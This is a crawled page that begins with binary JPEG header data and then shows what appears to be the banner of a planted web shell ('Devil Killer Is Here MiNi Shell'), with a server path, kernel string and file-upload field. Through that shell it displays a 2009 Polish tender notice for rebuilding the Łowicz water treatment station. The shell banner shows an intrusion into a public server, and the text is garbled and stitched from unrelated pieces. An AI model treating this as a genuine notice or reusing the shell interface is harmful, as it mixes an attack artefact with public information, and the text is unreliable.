JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090326/78778-N-2009.html

<p class="kh_header"><b>Łowicz: UJĘCIA  I STACJA UZDATNIANIA WODY W ŁOWICZU</b><br>
<b>Numer ogłoszenia: 78778 - 2009; data zamieszczenia: 26.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Łowicza , Stary Rynek 1, 99-400 Łowicz, woj. łódzkie, tel. 046 8309151, faks 046 8309160.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.lowicz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UJĘCIA  I STACJA UZDATNIANIA WODY W ŁOWICZU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <br>1.Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu przebudowy istniejących komunalnych ujęć wody  oraz rozbudowy i przebudowy stacji uzdatniania wody w  Łowiczu, przy ul. Blich 3  wg posiadanej przez Zamawiającego dokumentacji technicznej  i pozwoleń na budowę wyszczególnionych w Części IV SIWZ - Dokumentacja w plikach PDF, zawierającej :<br>
1.	Projekt zagospodarowania działek nr 1393 i 14391/7 dla budynku S.U.W.<br>
2.	Projekt budowlano wykonawczy przebudowy budynku S.U.W. Docieplenie 
             budynku S.U.W.<br>
3.	Projekt budowlano- wykonawczy przebudowy budynku S.U.W.  Część 
             konstrukcyjna<br>
4.	Projekt budowlano- wykonawczy zbiornika kontaktowego . Część 
             konstrukcyjna<br>
5.	Projekt budowlano- wykonawczy odstojnika wód popłucznych. Część 
            konstrukcyjna<br>
6.	Projekt budowlano- wykonawczy ujęcia i stacji uzdatniania wody. Część   
            technologiczna<br>
7.	Projekt budowlano- wykonawczy kotłowni węglowej i instalacji c.o.<br>
8.	Projekt budowlano- wykonawczy instalacji wod-kan i wentylacji,<br>
9.	Projekt budowlano- wykonawczy instalacji osuszania  powietrza w hali 
             filtrów, pompowni, galerii rurociągów<br>
10.	Projekt budowlano - wykonawczy stacji trafo 15/0,4 kV 2 x 630 kVA - 
             remont urządzeń n.n.<br>
11.	Projekt budowlano - wykonawczy linii kablowych nn zasilających budynek 
            SUW oraz linii kablowych do odbiorników technologicznych <br>
12.	Projekt budowlano - wykonawczy instalacji elektrycznych wewnętrznych.<br>
13.	 Projekt budowlano - wykonawczy komputerowego systemu sterowania i 
              monitoringu<br>
14.	Przedmiar robót. Branża budowlano - konstrukcyjna dla I etapu realizacji 
             inwestycji.<br>
15.	Przedmiar robót. Branża budowlano - konstrukcyjna dla II etapu realizacji 
             inwestycji.<br>
16.	Przedmiar robót. Branża budowlano - konstrukcyjna dla III etapu realizacji 
             inwestycji.<br>
17.	Przedmiar robót. Branża  technologiczno - sanitarna dla I etapu realizacji 
             inwestycji.<br>
18.	Przedmiar robót. Branża  technologiczno - sanitarna dla II etapu realizacji 
             inwestycji.<br>
19.	Przedmiar robót. Branża technologiczno - sanitarna dla III  etapu 
             realizacji inwestycji.<br>
20.	Przedmiar robót dla  robót elektrycznych  ( poz. 9)<br>
21.	Przedmiar  robót dla  robót elektrycznych  ( poz. 10)<br>
22.	Przedmiar  robót dla  instalacji elektrycznych wewnętrznych (poz.11)<br>
23.	Przedmiar  robót dla  komputerowego systemu sterowania i monitoringu  
            ( poz. 12)<br>
24.	Przedmiar  robót, łączność radiowa- automatyka i A.K.P. Alternatywa do 
            transmisji  kablowej od studni<br>
25.	Informacja dotycząca bezpieczeństwa i ochrony zdrowa.<br>
26.	 Specyfikacja techniczna wykonania i odbioru robót. Część budowlano - 
              konstrukcyjna<br>
27.	Specyfikacja techniczna wykonania i odbioru robót. Część 
             technologiczno - sanitarna.<br>
28.	Specyfikacja techniczna wykonania i odbioru robót. Linie kablowe 
             zewnętrzne.<br>
29.	Specyfikacja techniczna wykonania i odbioru robót. Instalacje 
             elektryczne wewnętrzne<br>
30.	Specyfikacja techniczna wykonania i odbioru robót. Stacja 
             trafo 15/0,4 kV 2 x 630 kVA - remont urządzeń n.n.<br>
31.	 Harmonogram robót i czynności organizacyjnych związanych z 
             przebudową ujęcia oraz rozbudową i przebudową obiektów stacji 
             uzdatniania wody.<br>
32.	Projekt zamienny w części dotyczącej projektu zagospodarowania 
            działek: Nr  1391/7, 1391/36,1393,1391/5, 1381/2, 1381/5, 1381/6, 
            1381/3, 1391/4, 1391/3,  1391/2, 1391/37. <br>
33.	Decyzja Starosty Łowickiego Nr AB.7351-533/2007  z dnia 18 
            października 2007 roku  zatwierdzająca  projekt budowlany i udzielająca 
             pozwolenie na budowę polegajacą na przebudowie istniejących 
              komunalnych ujęc wody z uworów czwartorzędowych,
            trzeciorzędowych i dolnokredowych oraz rozbudowę i przebudowę 
            obiektów stacji uzdatniania wody.<br> 
34.	Decyzja Starosty Łowickiego Nr AB.7351-399/2008 z dnia 21 sierpnia 
             2008 roku  zatwierdzająca zamienny projekt budowlany  na przebudowę 
             istniejących  komunalnych ujęć wody z uworów  
            czwartorzędowych,trzeciorzędowych i  dolnokredowych oraz rozbudowę i 
            przebudowę obiektów stacji uzdatniania wody.<br>
 
      Stacja uzdatniania zasila w wodę zabudowę miasta oraz zakłady przemysłowe. 
 Jakość wody uzdatnionej po wykonaniu zamówienia musi  spełniać stale wymagania  podane w Rozporządzeniu Ministra Zdrowia z dnia 29 marca 2007 roku. w sprawie  jakości wody przeznaczonej do spożycia przez ludzi (Dz. U. Nr 61, poz. 417). <br>
2. Zamówienie  realizowane będzie w trzech etapach, zgodnie z harmonogramem robót ( rozdział IV pkt. 20 SIWZ),  a  zakres robót  przedstawiony jest w Ogólnym zakresie  robót  ( część II  niniejszej specyfikacji )  oraz  w  dokumentacji technicznej (część IV   niniejszej  specyfikacji).<br>
3.Przebudowa stacji przewidywana jest przy zachowaniu ciągłości w dostawie wody uzdatnionej  do miasta, (z uwzględnieniem uwag zawartych w harmonogramie robót i czynności organizacyjnych). <br>  
      Podstawowym celem inwestycji jest uzyskanie jakości wody  uzdatnionej zgodnie   z wymaganiami Rozporządzenia Ministra Zdrowia z dnia 29 marca  2007 r. w sprawie  jakości wody przeznaczonej do spożycia przez ludzi (Dz. U. Nr 61,  poz. 417).<br>
4.Roboty winny zostać wykonane i ukończone zgodnie z prawem obowiązującym w Rzeczypospolitej Polskiej, w szczególności: Prawem Budowlanym, Prawem ochrony środowiska, Prawem o ruchu drogowym oraz Ustawą o drogach publicznych, Ustawą o odpadach, Ustawą o badaniach i certyfikacji i wymaganiami Zamawiającego, a kierowanie i nadzorowanie robót mogą wykonywać osoby, które posiadają wymagane prawem uprawnienia i są ubezpieczone od odpowiedzialności cywilnej. <br>
5.Przedmiot zamówienia obejmuje również:<br>
a) uzyskanie niezbędnych decyzji i pozwoleń związanych z etapami budowlanymi w ramach  obowiązujących przepisów prawa polskiego, w tym UDT.<br>
b) obsługę geodezyjną, w tym geodezyjną inwentaryzację powykonawczą,<br>
c) realizację warunków określonych w opiniach, uzgodnieniach, decyzjach, pozwoleniach,<br>
d) przeprowadzenie ewentualnych badań i prób,<br>
e) zagospodarowanie terenu,<br>
f) opracowanie operatu powykonawczego,<br>
g) komisyjny  rozruch technologiczny końcowy z instrukcją  eksploatacji.<br>
Ogólny  zakres robót stanowiących przedmiot zamówienia, z podziałem na etapy i branże,  określony został w Części II SIWZ, natomiast szczegółowy zakres robót , określony został w dokumentacji projektowej, przedmiarach robót i specyfikacjach technicznych wykonania i odbioru robót, stanowiących Część  IV  SIWZ.<br>
Dokumentacja projektowa dotycząca przedmiotu zamówienia udostępniona jest na stronie internetowej Zamawiającego http://www.bip.lowicz .eu    oraz  Pełnomocnika Zamawiającego http:// www.zuk.bip.lowicz.eu ,  jest także  do wglądu w siedzibie Zamawiającego w godzinach 8.00 - 15.00, po uprzednim uzgodnieniu terminu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.26-7, 45.25.51.00-3, 45.23.21.50-8, 45.26.27.00-8, 45.22.32.10-1, 45.23.22.21-7, 45.23.14.00-9, 45.23.24.30-5, 45.31.00.00-3, 45.23.11.00-6, 45.24.72.70-3, 45.23.24.10-9, 45.23.24.23-3, 45.33.12.10-1, 45.33.12.20-4, 45.33.11.00-7, 45.31.43.20-0, 45.22.00.00-5, 45.11.12.00-0, 45.26.28.00-9, 45.23.24.40-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> <br>1.Wykonawca składając ofertę zobowiązany jest do wniesienia wadium w wysokości 150 000 PLN (słownie: sto pięćdziesiąt tysięcy złotych  ). <br>
2.Wadium powinno być wniesione przed upływem terminu składania ofert w jednej lub kilku  następujących formach:<br>
  a)  w pieniądzu, przelewem na rachunek bankowy  Urzędu Miejskiego  w Łowiczu 
       w Kredyt Bank S.A. , Oddział Skierniewice,  Filia Nr 5 w Łowiczu 
       nr  81 1500 1689 1216 8005 0182 0000,<br>
  b)  w poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
        oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,<br>
c)  w gwarancjach bankowych, <br>   
d)	w gwarancjach ubezpieczeniowych,<br>
e)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b  ust. 5 pkt. 2 .  ustawy z dnia 9 listopada 2000r. O utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz. U. Nr 109, poz. 1158  z późn. zm. ).<br>
3.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br>
4.W przypadku składania przez Wykonawcę wadium w formie gwarancji, powinna być ona sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:<br>
a)	nazwę zamówienia publicznego,<br>
b)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), Gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,<br>
c)	określenie wierzytelności, która ma być zabezpieczona gwarancją,<br>
d)	kwotę gwarancji,<br>
e)	termin ważności gwarancji (do terminu związania ofertą),<br>
f)	zobowiązanie Gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zgłoszone w terminie związania ofertą, zawierające oświadczenie, iż Wykonawca, którego oferta została wybrana:<br>
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<br>
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,<br>
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br>
Powyższe postanowienia stosuje się odpowiednio do poręczeń określonych w ppkt 2
 lit. b i e.<br>
5.Gwarancja (poręczenie) musi zostać podpisana przez upoważnionego przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację  (np. złożony z imienną pieczątką lub czytelny z podaniem imienia i nazwiska).<br>
6.Oryginał poręczeń lub gwarancji należy złożyć w kasie Zamawiającego przed terminem składania ofert. <br>Do oferty należy dołączyć kopię polecenia przelewu z potwierdzeniem  dokonanej przez bank operacji finansowej, gdy wadium było wniesione w pieniądzu. <br>
         Kopię dokumentu potwierdzającego wniesienie wadium w pozostałych formach (np. gwarancja, poręczenie) należy dołączyć do oferty. <br>
7.Zwrot wadium odbywać się będzie zgodnie z zasadami określonymi w Art. 46 Ustawy  Pzp.<br>
8.Zamawiający zażąda ponownego wniesienia wadium przez Wykonawców, którym  zwrócono wadium w przypadku wykluczenia z postępowania lub odrzucenia oferty, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność  wykluczenia Wykonawcy lub odrzucenia oferty. W takim przypadku Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.<br>
9.Jeśli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami  wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. <br>
10.Wykonawca traci wadium na rzecz Zamawiającego, jeżeli odmówi podpisania umowy na warunkach określonych w ofercie oraz w pozostałych przypadkach określonych w art. 46 ust. 4a oraz 5 ustawy Pzp.<br>
11.Wykonawca, który  nie wniósł wadium, w tym również na przedłużony okres związania ofertą lub nie zgodził się na przedłużenie okresu związania ofertą - zostanie  wykluczony z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 2 pkt 4 ustawy Pzp.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> <br>1.Warunki formalne:<br>
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Pzp oraz nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy. W tym celu Wykonawcy winni potwierdzić i udokumentować, że:<br>
a)Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.<br>
b)Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.<br>
c)Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.<br>
d)Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.<br>
2. Warunki ekonomiczne i techniczne:<br>
2.1.Potencjał ekonomiczny i finansowy. <br>
Aby udokumentować, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy wykazać, że:<br>
a)Wykonawca posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 5.000.000 PLN.<br>
b)Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż  15.000.000 PLN. <br>
c)Wykonawca posiada roczny przerób w zakresie robót budowlano - montażowych nie mniejszy niż 10.000.000 PLN.<br>
2.2.Potencjał kadrowy.<br> 
       2.2.1 Wykonawca winien dysponować osobami odpowiedzialnymi za wykonanie zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób wykwalifikowanych, zdolnych do wykonania zamówienia, posiadających uprawnienia budowlane, upoważniające w świetle obowiązujących przepisów do kierowania i nadzorowania robót w zakresie następujących specjalności: konstrukcyjno - budowlanej; instalacyjnej w zakresie sieci, instalacji i urządzeń sanitarnych, tj. wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych i gazowych; instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br>
Wymagane osoby to: <br>
a)Kierownik Budowy - posiadający następujące kwalifikacje:
- co najmniej 5 lat doświadczenia zawodowego (liczone od dnia uzyskania uprawnień) na stanowisku Kierownika Budowy z zakresu robót sanitarnych, w tym kierowanie budową (modernizacją-rozbudową-przebudową minimum dwóch stacji uzdatniania wody, w tym jednej o przepustowości co najmniej 150m3 na godzinę<br>
- uprawnienia budowlane bez ograniczeń do kierowania budową i robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych i gazowych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br>
-aktualny wpis na listę członków właściwej izby samorządu zawodowego wydane przez tę izbę.<br>
b)	Kierownik Robót Sanitarnych - posiadający następujące kwalifikacje: <br>
- co najmniej 4 lata doświadczenia zawodowego na stanowisku Kierownika Robót Sanitarnych, liczone od dnia uzyskania uprawnień,<br>
-uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji sanitarnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br>
-aktualny wpis na listę członków właściwej izby samorządu zawodowego wydane przez tę izbę.<br>
c) Kierownik Robót Elektrycznych - posiadający następujące kwalifikacje: <br>
-co najmniej 3 lata doświadczenia zawodowego na stanowisku Kierownika Robót Elektrycznych, liczone od dnia uzyskania uprawnień,<br>
-uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br>
-aktualny wpis na listę członków właściwej izby samorządu zawodowego wydane przez tę izbę,<br>
d)Kierownik Robót Konstrukcyjno-Budowlanych - posiadający następujące kwalifikacje:<br>
-co najmniej 4 lata doświadczenia zawodowego na stanowisku Kierownika Robót Konstrukcyjno-Budowlanych, liczone od dnia uzyskania uprawnień.<br>
-uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br>
- aktualny wpis na listę członków właściwej izby samorządu zawodowego wydane przez tę izbę.<br>
2.2.2 Wykonawca w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie niniejszego zamówienia, a w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie, zatrudniał przeciętnie, co najmniej 40 osób. <br>
3.	Doświadczenie Wykonawcy.<br>
Wykonawca winien udokumentować posiadanie doświadczenie zawodowe w zakresie  robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia. <br>
Wykonawca przedstawi dokumenty świadczące o tym, że w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał budowę, przebudowę, rozbudowę lub modernizację  minimum dwóch instalacji uzdatniania wody o wydajności dwustopniowego ciśnieniowego układu filtracji nie mniejszej niż 300 m3 na godzinę. 
Przynajmniej jedno ze zrealizowanych zadań powinno być o wartości nie mniejszej niż  6,0 mln PLN netto, a  w zakresie  odpowiadać swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia i zawierać : budowę żelbetowego zbiornika wody surowej z zewnętrznym otwartym układem napowietrzania, dostawę i montaż generatora podchlorynu sodu oraz agregatu prądotwórczego, montaż układu pompowego i systemu sterowania  oraz budowę i przebudowę budynku technologicznego .<br>

4.Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie analizy złożonej oferty, przy zastosowaniu kryterium -spełnia - nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, że Wykonawca spełnia postawione warunki udziału w postępowaniu. Oferta spełniająca wymagania otrzyma ocenę -spełnia, natomiast oferta niespełniająca postawionych wymagań otrzyma ocenę -nie spełnia i zostanie odrzucona, a Wykonawca, który ją złożył zostanie wykluczony z postępowania. <br>
5.Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę w przypadkach określonych w art. 24 ust. 1 i 2 ustawy oraz w przypadku niespełnienia warunków udziału w postępowaniu określonych szczegółowo w niniejszej SIWZ, z zastrzeżeniem postanowień art. 26 ust. 3 ustawy. Zamawiający o wykluczeniu z postępowania powiadomi równocześnie Wykonawców, którzy zostali wykluczeni podając uzasadnienie faktyczne i prawne. <br>
6.Zamawiający odrzuca ofertę w przypadkach określonych w art. 89 ust. 1 ustawy Pzp. Zamawiający powiadomi równocześnie wszystkich Wykonawców o odrzuceniu ofert z podaniem podstaw faktycznych i prawnych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> <br>1. Oferta przedłożona przez Wykonawcę musi zawierać następujące dokumenty, m. in.:<br>
1.1.	Formularz oferty z wykorzystaniem załączonego wzoru - Załącznik nr 1.<br>
1.2.	Dowód wniesienia/wpłacenia wadium.<br>
1.3.	Oświadczenie dot. spełniania warunków udziału w postępowaniu - zgodnie z Załącznikiem nr 2.<br>
1.4.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, potwierdzające dopuszczenie Wykonawcy do obrotu prawnego w zakresie objętym zamówieniem oraz określające osoby upoważnione do dokonywania czynności prawnych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.<br>
1.5.	Upoważnienie potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynika ono z przepisów prawa lub innych dokumentów rejestrowych.<br>
1.6.	Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.<br>
1.7.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.<br>
1.8.	Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br>
1.9.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z zakresem wykonywanych przez nie czynności wg Załącznika nr 3 lub pisemne zobowiązanie innych podmiotów do udostępnienia osób odpowiedzialnych za wykonanie zadania.<br>
1.10.	Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie posiadają uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień wraz z zaświadczeniami o wpisie na listę członków okręgowej izby samorządu zawodowego. <br>
1.11	Informacja na temat przeciętnej liczby zatrudnionych pracowników w okresie ostatnich trzech lat lub z okresu prowadzenia działalności, jeśli jest ona krótsza niż 3 lata - wg Załącznika nr 4. <br>  
1.12.	Wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania ( tj. przed dniem opublikowania ogłoszenia o zamówieniu w BZP), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania - zgodnie z Załącznikiem nr 5.<br>
